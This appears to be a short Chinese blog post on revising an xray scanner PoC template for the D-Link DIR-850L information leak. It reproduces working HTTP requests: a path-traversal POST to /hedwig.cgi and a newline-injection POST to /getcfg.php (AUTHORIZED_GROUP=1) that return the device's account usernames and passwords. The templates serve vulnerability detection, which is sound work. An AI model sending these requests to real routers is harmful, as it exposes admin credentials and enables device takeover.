xray插件改良3-poc-yaml-dlink-850l-info-leak
前言
poc-yaml-dlink-850l-info-leak原始的yml
poc-yaml-dlink-850l-info-leak
name: poc-yaml-dlink-850l-info-leak
rules:
- method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: |-
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "Dir-850L"
links:
- https://xz.aliyun.com/t/2941
根据links的描述,信息泄露第一种方式是通过\n增加了一个全局变量导致的
所以最终的poc可以修改为
name: poc-yaml-dlink-850l-info-leak
groups:
poc1:
- method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: |-
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
poc2:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "Dir-850L"
links:
- https://xz.aliyun.com/t/2941
后续
poc-yaml-dlink-cve-2019-17506就是检测这个的,只是拆分成了两个poc。
poc-yaml-dlink-cve-2020-9376-dump-credentials这个也是,起始都是一个问题,完全可以合并了检测。。